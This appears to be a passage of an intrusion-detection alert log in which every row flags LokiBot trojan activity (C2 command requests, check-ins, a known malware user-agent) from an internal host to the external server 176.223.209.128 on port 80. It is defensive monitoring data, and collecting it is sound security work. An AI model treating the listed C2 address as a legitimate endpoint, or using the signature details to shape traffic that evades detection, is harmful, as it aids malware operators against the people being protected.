11/25/21-10:54:16.294505	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50574	80	192.168.11.20	176.223.209.128
11/25/21-10:54:16.790297	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50575	80	192.168.11.20	176.223.209.128
11/25/21-10:54:16.790297	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50575	80	192.168.11.20	176.223.209.128
11/25/21-10:54:16.790297	TCP	2025381	ET TROJAN LokiBot Checkin	50575	80	192.168.11.20	176.223.209.128
11/25/21-10:54:16.790297	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50575	80	192.168.11.20	176.223.209.128
11/25/21-10:54:17.290043	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50576	80	192.168.11.20	176.223.209.128
11/25/21-10:54:17.290043	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50576	80	192.168.11.20	176.223.209.128
11/25/21-10:54:17.290043	TCP	2025381	ET TROJAN LokiBot Checkin	50576	80	192.168.11.20	176.223.209.128
11/25/21-10:54:17.290043	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50576	80	192.168.11.20	176.223.209.128
11/25/21-10:54:17.798373	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50577	80	192.168.11.20	176.223.209.128
11/25/21-10:54:17.798373	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50577	80	192.168.11.20	176.223.209.128
11/25/21-10:54:17.798373	TCP	2025381	ET TROJAN LokiBot Checkin	50577	80	192.168.11.20	176.223.209.128
11/25/21-10:54:17.798373	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50577	80	192.168.11.20	176.223.209.128
11/25/21-10:54:18.280836	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50578	80	192.168.11.20	176.223.209.128
11/25/21-10:54:18.280836	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50578	80	192.168.11.20	176.223.209.128
11/25/21-10:54:18.280836	TCP	2025381	ET TROJAN LokiBot Checkin	50578	80	192.168.11.20	176.223.209.128
11/25/21-10:54:18.280836	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50578	80	192.168.11.20	176.223.209.128
11/25/21-10:54:18.732676	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50579	80	192.168.11.20	176.223.209.128
11/25/21-10:54:18.732676	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50579	80	192.168.11.20	176.223.209.128
11/25/21-10:54:18.732676	TCP	2025381	ET TROJAN LokiBot Checkin	50579	80	192.168.11.20	176.223.209.128
11/25/21-10:54:18.732676	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50579	80	192.168.11.20	176.223.209.128
11/25/21-10:54:19.228582	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50580	80	192.168.11.20	176.223.209.128
11/25/21-10:54:19.228582	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50580	80	192.168.11.20	176.223.209.128
11/25/21-10:54:19.228582	TCP	2025381	ET TROJAN LokiBot Checkin	50580	80	192.168.11.20	176.223.209.128
11/25/21-10:54:19.228582	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50580	80	192.168.11.20	176.223.209.128
11/25/21-10:54:19.735000	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50581	80	192.168.11.20	176.223.209.128
11/25/21-10:54:19.735000	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50581	80	192.168.11.20	176.223.209.128
11/25/21-10:54:19.735000	TCP	2025381	ET TROJAN LokiBot Checkin	50581	80	192.168.11.20	176.223.209.128
11/25/21-10:54:19.735000	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50581	80	192.168.11.20	176.223.209.128
11/25/21-10:54:20.196224	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50582	80	192.168.11.20	176.223.209.128
11/25/21-10:54:20.196224	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50582	80	192.168.11.20	176.223.209.128
11/25/21-10:54:20.196224	TCP	2025381	ET TROJAN LokiBot Checkin	50582	80	192.168.11.20	176.223.209.128
11/25/21-10:54:20.196224	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50582	80	192.168.11.20	176.223.209.128
11/25/21-10:54:20.692031	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50583	80	192.168.11.20	176.223.209.128
11/25/21-10:54:20.692031	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50583	80	192.168.11.20	176.223.209.128
11/25/21-10:54:20.692031	TCP	2025381	ET TROJAN LokiBot Checkin	50583	80	192.168.11.20	176.223.209.128
11/25/21-10:54:20.692031	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50583	80	192.168.11.20	176.223.209.128
11/25/21-10:54:21.190323	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50584	80	192.168.11.20	176.223.209.128
11/25/21-10:54:21.190323	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50584	80	192.168.11.20	176.223.209.128
11/25/21-10:54:21.190323	TCP	2025381	ET TROJAN LokiBot Checkin	50584	80	192.168.11.20	176.223.209.128
11/25/21-10:54:21.190323	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50584	80	192.168.11.20	176.223.209.128
11/25/21-10:54:21.687268	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50585	80	192.168.11.20	176.223.209.128
11/25/21-10:54:21.687268	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50585	80	192.168.11.20	176.223.209.128
11/25/21-10:54:21.687268	TCP	2025381	ET TROJAN LokiBot Checkin	50585	80	192.168.11.20	176.223.209.128
11/25/21-10:54:21.687268	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50585	80	192.168.11.20	176.223.209.128
11/25/21-10:54:22.210906	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50586	80	192.168.11.20	176.223.209.128
11/25/21-10:54:22.210906	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50586	80	192.168.11.20	176.223.209.128
11/25/21-10:54:22.210906	TCP	2025381	ET TROJAN LokiBot Checkin	50586	80	192.168.11.20	176.223.209.128
11/25/21-10:54:22.210906	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50586	80	192.168.11.20	176.223.209.128
11/25/21-10:54:22.705041	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50587	80	192.168.11.20	176.223.209.128
11/25/21-10:54:22.705041	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50587	80	192.168.11.20	176.223.209.128
11/25/21-10:54:22.705041	TCP	2025381	ET TROJAN LokiBot Checkin	50587	80	192.168.11.20	176.223.209.128
11/25/21-10:54:22.705041	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50587	80	192.168.11.20	176.223.209.128
11/25/21-10:54:23.229445	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50588	80	192.168.11.20	176.223.209.128
11/25/21-10:54:23.229445	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50588	80	192.168.11.20	176.223.209.128
11/25/21-10:54:23.229445	TCP	2025381	ET TROJAN LokiBot Checkin	50588	80	192.168.11.20	176.223.209.128
11/25/21-10:54:23.229445	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50588	80	192.168.11.20	176.223.209.128
11/25/21-10:54:23.722718	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50589	80	192.168.11.20	176.223.209.128
11/25/21-10:54:23.722718	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50589	80	192.168.11.20	176.223.209.128
11/25/21-10:54:23.722718	TCP	2025381	ET TROJAN LokiBot Checkin	50589	80	192.168.11.20	176.223.209.128
11/25/21-10:54:23.722718	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50589	80	192.168.11.20	176.223.209.128
11/25/21-10:54:24.176005	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50590	80	192.168.11.20	176.223.209.128
11/25/21-10:54:24.176005	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50590	80	192.168.11.20	176.223.209.128
11/25/21-10:54:24.176005	TCP	2025381	ET TROJAN LokiBot Checkin	50590	80	192.168.11.20	176.223.209.128
11/25/21-10:54:24.176005	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50590	80	192.168.11.20	176.223.209.128
11/25/21-10:54:24.687769	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50591	80	192.168.11.20	176.223.209.128
11/25/21-10:54:24.687769	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50591	80	192.168.11.20	176.223.209.128
11/25/21-10:54:24.687769	TCP	2025381	ET TROJAN LokiBot Checkin	50591	80	192.168.11.20	176.223.209.128
11/25/21-10:54:24.687769	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50591	80	192.168.11.20	176.223.209.128
11/25/21-10:54:25.208926	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50592	80	192.168.11.20	176.223.209.128
11/25/21-10:54:25.208926	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50592	80	192.168.11.20	176.223.209.128
11/25/21-10:54:25.208926	TCP	2025381	ET TROJAN LokiBot Checkin	50592	80	192.168.11.20	176.223.209.128
11/25/21-10:54:25.208926	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50592	80	192.168.11.20	176.223.209.128
11/25/21-10:54:25.717249	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50593	80	192.168.11.20	176.223.209.128
11/25/21-10:54:25.717249	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50593	80	192.168.11.20	176.223.209.128
11/25/21-10:54:25.717249	TCP	2025381	ET TROJAN LokiBot Checkin	50593	80	192.168.11.20	176.223.209.128
11/25/21-10:54:25.717249	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50593	80	192.168.11.20	176.223.209.128
11/25/21-10:54:26.227737	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50594	80	192.168.11.20	176.223.209.128
11/25/21-10:54:26.227737	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50594	80	192.168.11.20	176.223.209.128
11/25/21-10:54:26.227737	TCP	2025381	ET TROJAN LokiBot Checkin	50594	80	192.168.11.20	176.223.209.128
11/25/21-10:54:26.227737	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50594	80	192.168.11.20	176.223.209.128
11/25/21-10:54:26.656063	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50595	80	192.168.11.20	176.223.209.128
11/25/21-10:54:26.656063	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50595	80	192.168.11.20	176.223.209.128
11/25/21-10:54:26.656063	TCP	2025381	ET TROJAN LokiBot Checkin	50595	80	192.168.11.20	176.223.209.128
11/25/21-10:54:26.656063	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50595	80	192.168.11.20	176.223.209.128
11/25/21-10:54:27.183294	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50596	80	192.168.11.20	176.223.209.128
11/25/21-10:54:27.183294	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50596	80	192.168.11.20	176.223.209.128
11/25/21-10:54:27.183294	TCP	2025381	ET TROJAN LokiBot Checkin	50596	80	192.168.11.20	176.223.209.128
11/25/21-10:54:27.183294	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50596	80	192.168.11.20	176.223.209.128
11/25/21-10:54:27.683854	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50597	80	192.168.11.20	176.223.209.128
11/25/21-10:54:27.683854	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50597	80	192.168.11.20	176.223.209.128
11/25/21-10:54:27.683854	TCP	2025381	ET TROJAN LokiBot Checkin	50597	80	192.168.11.20	176.223.209.128
11/25/21-10:54:27.683854	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50597	80	192.168.11.20	176.223.209.128
11/25/21-10:54:28.164932	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50598	80	192.168.11.20	176.223.209.128
11/25/21-10:54:28.164932	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50598	80	192.168.11.20	176.223.209.128
11/25/21-10:54:28.164932	TCP	2025381	ET TROJAN LokiBot Checkin	50598	80	192.168.11.20	176.223.209.128
11/25/21-10:54:28.164932	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50598	80	192.168.11.20	176.223.209.128
11/25/21-10:54:28.673309	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50599	80	192.168.11.20	176.223.209.128
11/25/21-10:54:28.673309	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50599	80	192.168.11.20	176.223.209.128
11/25/21-10:54:28.673309	TCP	2025381	ET TROJAN LokiBot Checkin	50599	80	192.168.11.20	176.223.209.128
11/25/21-10:54:28.673309	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50599	80	192.168.11.20	176.223.209.128
11/25/21-10:54:29.175600	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50600	80	192.168.11.20	176.223.209.128
11/25/21-10:54:29.175600	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50600	80	192.168.11.20	176.223.209.128
11/25/21-10:54:29.175600	TCP	2025381	ET TROJAN LokiBot Checkin	50600	80	192.168.11.20	176.223.209.128
11/25/21-10:54:29.175600	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50600	80	192.168.11.20	176.223.209.128
11/25/21-10:54:29.632936	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50601	80	192.168.11.20	176.223.209.128
11/25/21-10:54:29.632936	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50601	80	192.168.11.20	176.223.209.128
11/25/21-10:54:29.632936	TCP	2025381	ET TROJAN LokiBot Checkin	50601	80	192.168.11.20	176.223.209.128
11/25/21-10:54:29.632936	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50601	80	192.168.11.20	176.223.209.128
11/25/21-10:54:30.061319	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50602	80	192.168.11.20	176.223.209.128
11/25/21-10:54:30.061319	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50602	80	192.168.11.20	176.223.209.128
11/25/21-10:54:30.061319	TCP	2025381	ET TROJAN LokiBot Checkin	50602	80	192.168.11.20	176.223.209.128
11/25/21-10:54:30.061319	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50602	80	192.168.11.20	176.223.209.128
11/25/21-10:54:30.580873	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50603	80	192.168.11.20	176.223.209.128
11/25/21-10:54:30.580873	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50603	80	192.168.11.20	176.223.209.128
11/25/21-10:54:30.580873	TCP	2025381	ET TROJAN LokiBot Checkin	50603	80	192.168.11.20	176.223.209.128
11/25/21-10:54:30.580873	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50603	80	192.168.11.20	176.223.209.128
11/25/21-10:54:31.098892	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50604	80	192.168.11.20	176.223.209.128
11/25/21-10:54:31.098892	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50604	80	192.168.11.20	176.223.209.128
11/25/21-10:54:31.098892	TCP	2025381	ET TROJAN LokiBot Checkin	50604	80	192.168.11.20	176.223.209.128
11/25/21-10:54:31.098892	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50604	80	192.168.11.20	176.223.209.128
11/25/21-10:54:31.612838	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50605	80	192.168.11.20	176.223.209.128
11/25/21-10:54:31.612838	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50605	80	192.168.11.20	176.223.209.128
11/25/21-10:54:31.612838	TCP	2025381	ET TROJAN LokiBot Checkin	50605	80	192.168.11.20	176.223.209.128
11/25/21-10:54:31.612838	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50605	80	192.168.11.20	176.223.209.128
11/25/21-10:54:32.118997	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50606	80	192.168.11.20	176.223.209.128
11/25/21-10:54:32.118997	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50606	80	192.168.11.20	176.223.209.128
11/25/21-10:54:32.118997	TCP	2025381	ET TROJAN LokiBot Checkin	50606	80	192.168.11.20	176.223.209.128
11/25/21-10:54:32.118997	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50606	80	192.168.11.20	176.223.209.128
11/25/21-10:54:32.556276	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50607	80	192.168.11.20	176.223.209.128
11/25/21-10:54:32.556276	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50607	80	192.168.11.20	176.223.209.128
11/25/21-10:54:32.556276	TCP	2025381	ET TROJAN LokiBot Checkin	50607	80	192.168.11.20	176.223.209.128
11/25/21-10:54:32.556276	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50607	80	192.168.11.20	176.223.209.128
11/25/21-10:54:33.057683	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50608	80	192.168.11.20	176.223.209.128
11/25/21-10:54:33.057683	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50608	80	192.168.11.20	176.223.209.128
11/25/21-10:54:33.057683	TCP	2025381	ET TROJAN LokiBot Checkin	50608	80	192.168.11.20	176.223.209.128
11/25/21-10:54:33.057683	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50608	80	192.168.11.20	176.223.209.128
11/25/21-10:54:33.558687	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50609	80	192.168.11.20	176.223.209.128
11/25/21-10:54:33.558687	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50609	80	192.168.11.20	176.223.209.128
11/25/21-10:54:33.558687	TCP	2025381	ET TROJAN LokiBot Checkin	50609	80	192.168.11.20	176.223.209.128
11/25/21-10:54:33.558687	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50609	80	192.168.11.20	176.223.209.128
11/25/21-10:54:34.080656	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50610	80	192.168.11.20	176.223.209.128
11/25/21-10:54:34.080656	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50610	80	192.168.11.20	176.223.209.128
11/25/21-10:54:34.080656	TCP	2025381	ET TROJAN LokiBot Checkin	50610	80	192.168.11.20	176.223.209.128
11/25/21-10:54:34.080656	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50610	80	192.168.11.20	176.223.209.128
11/25/21-10:54:34.588985	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50611	80	192.168.11.20	176.223.209.128
11/25/21-10:54:34.588985	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50611	80	192.168.11.20	176.223.209.128
11/25/21-10:54:34.588985	TCP	2025381	ET TROJAN LokiBot Checkin	50611	80	192.168.11.20	176.223.209.128
11/25/21-10:54:34.588985	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50611	80	192.168.11.20	176.223.209.128
11/25/21-10:54:35.090544	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50612	80	192.168.11.20	176.223.209.128
11/25/21-10:54:35.090544	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50612	80	192.168.11.20	176.223.209.128
11/25/21-10:54:35.090544	TCP	2025381	ET TROJAN LokiBot Checkin	50612	80	192.168.11.20	176.223.209.128
11/25/21-10:54:35.090544	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50612	80	192.168.11.20	176.223.209.128
11/25/21-10:54:35.567270	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50613	80	192.168.11.20	176.223.209.128
11/25/21-10:54:35.567270	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50613	80	192.168.11.20	176.223.209.128
11/25/21-10:54:35.567270	TCP	2025381	ET TROJAN LokiBot Checkin	50613	80	192.168.11.20	176.223.209.128
11/25/21-10:54:35.567270	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50613	80	192.168.11.20	176.223.209.128
11/25/21-10:54:36.074487	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50614	80	192.168.11.20	176.223.209.128
11/25/21-10:54:36.074487	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50614	80	192.168.11.20	176.223.209.128
11/25/21-10:54:36.074487	TCP	2025381	ET TROJAN LokiBot Checkin	50614	80	192.168.11.20	176.223.209.128
11/25/21-10:54:36.074487	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50614	80	192.168.11.20	176.223.209.128
11/25/21-10:54:36.588960	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50615	80	192.168.11.20	176.223.209.128
11/25/21-10:54:36.588960	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50615	80	192.168.11.20	176.223.209.128
11/25/21-10:54:36.588960	TCP	2025381	ET TROJAN LokiBot Checkin	50615	80	192.168.11.20	176.223.209.128
11/25/21-10:54:36.588960	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50615	80	192.168.11.20	176.223.209.128
11/25/21-10:54:37.058855	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50616	80	192.168.11.20	176.223.209.128
11/25/21-10:54:37.058855	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50616	80	192.168.11.20	176.223.209.128
11/25/21-10:54:37.058855	TCP	2025381	ET TROJAN LokiBot Checkin	50616	80	192.168.11.20	176.223.209.128
11/25/21-10:54:37.058855	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50616	80	192.168.11.20	176.223.209.128
11/25/21-10:54:37.563383	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50617	80	192.168.11.20	176.223.209.128
11/25/21-10:54:37.563383	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50617	80	192.168.11.20	176.223.209.128
11/25/21-10:54:37.563383	TCP	2025381	ET TROJAN LokiBot Checkin	50617	80	192.168.11.20	176.223.209.128
11/25/21-10:54:37.563383	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50617	80	192.168.11.20	176.223.209.128
11/25/21-10:54:38.018762	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50618	80	192.168.11.20	176.223.209.128
11/25/21-10:54:38.018762	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50618	80	192.168.11.20	176.223.209.128
11/25/21-10:54:38.018762	TCP	2025381	ET TROJAN LokiBot Checkin	50618	80	192.168.11.20	176.223.209.128
11/25/21-10:54:38.018762	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50618	80	192.168.11.20	176.223.209.128
11/25/21-10:54:38.499060	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50619	80	192.168.11.20	176.223.209.128
11/25/21-10:54:38.499060	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50619	80	192.168.11.20	176.223.209.128
11/25/21-10:54:38.499060	TCP	2025381	ET TROJAN LokiBot Checkin	50619	80	192.168.11.20	176.223.209.128
11/25/21-10:54:38.499060	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50619	80	192.168.11.20	176.223.209.128
11/25/21-10:54:39.022864	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50620	80	192.168.11.20	176.223.209.128
11/25/21-10:54:39.022864	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50620	80	192.168.11.20	176.223.209.128
11/25/21-10:54:39.022864	TCP	2025381	ET TROJAN LokiBot Checkin	50620	80	192.168.11.20	176.223.209.128
11/25/21-10:54:39.022864	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50620	80	192.168.11.20	176.223.209.128
11/25/21-10:54:39.521845	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50621	80	192.168.11.20	176.223.209.128
11/25/21-10:54:39.521845	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50621	80	192.168.11.20	176.223.209.128
11/25/21-10:54:39.521845	TCP	2025381	ET TROJAN LokiBot Checkin	50621	80	192.168.11.20	176.223.209.128
11/25/21-10:54:39.521845	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50621	80	192.168.11.20	176.223.209.128
11/25/21-10:54:40.029450	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50622	80	192.168.11.20	176.223.209.128
11/25/21-10:54:40.029450	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50622	80	192.168.11.20	176.223.209.128
11/25/21-10:54:40.029450	TCP	2025381	ET TROJAN LokiBot Checkin	50622	80	192.168.11.20	176.223.209.128
11/25/21-10:54:40.029450	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50622	80	192.168.11.20	176.223.209.128
11/25/21-10:54:40.556828	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50623	80	192.168.11.20	176.223.209.128
11/25/21-10:54:40.556828	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50623	80	192.168.11.20	176.223.209.128
11/25/21-10:54:40.556828	TCP	2025381	ET TROJAN LokiBot Checkin	50623	80	192.168.11.20	176.223.209.128
11/25/21-10:54:40.556828	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50623	80	192.168.11.20	176.223.209.128
11/25/21-10:54:41.063492	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50624	80	192.168.11.20	176.223.209.128
11/25/21-10:54:41.063492	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50624	80	192.168.11.20	176.223.209.128
11/25/21-10:54:41.063492	TCP	2025381	ET TROJAN LokiBot Checkin	50624	80	192.168.11.20	176.223.209.128
11/25/21-10:54:41.063492	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50624	80	192.168.11.20	176.223.209.128
11/25/21-10:54:41.563964	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50625	80	192.168.11.20	176.223.209.128
11/25/21-10:54:41.563964	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50625	80	192.168.11.20	176.223.209.128
11/25/21-10:54:41.563964	TCP	2025381	ET TROJAN LokiBot Checkin	50625	80	192.168.11.20	176.223.209.128
11/25/21-10:54:41.563964	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50625	80	192.168.11.20	176.223.209.128
11/25/21-10:54:42.044572	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50626	80	192.168.11.20	176.223.209.128
11/25/21-10:54:42.044572	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50626	80	192.168.11.20	176.223.209.128
11/25/21-10:54:42.044572	TCP	2025381	ET TROJAN LokiBot Checkin	50626	80	192.168.11.20	176.223.209.128
11/25/21-10:54:42.044572	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50626	80	192.168.11.20	176.223.209.128
11/25/21-10:54:42.547776	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50627	80	192.168.11.20	176.223.209.128
11/25/21-10:54:42.547776	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50627	80	192.168.11.20	176.223.209.128
11/25/21-10:54:42.547776	TCP	2025381	ET TROJAN LokiBot Checkin	50627	80	192.168.11.20	176.223.209.128
11/25/21-10:54:42.547776	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50627	80	192.168.11.20	176.223.209.128
11/25/21-10:54:43.023086	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50628	80	192.168.11.20	176.223.209.128
11/25/21-10:54:43.023086	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50628	80	192.168.11.20	176.223.209.128
11/25/21-10:54:43.023086	TCP	2025381	ET TROJAN LokiBot Checkin	50628	80	192.168.11.20	176.223.209.128
11/25/21-10:54:43.023086	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50628	80	192.168.11.20	176.223.209.128
11/25/21-10:54:43.528950	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50629	80	192.168.11.20	176.223.209.128
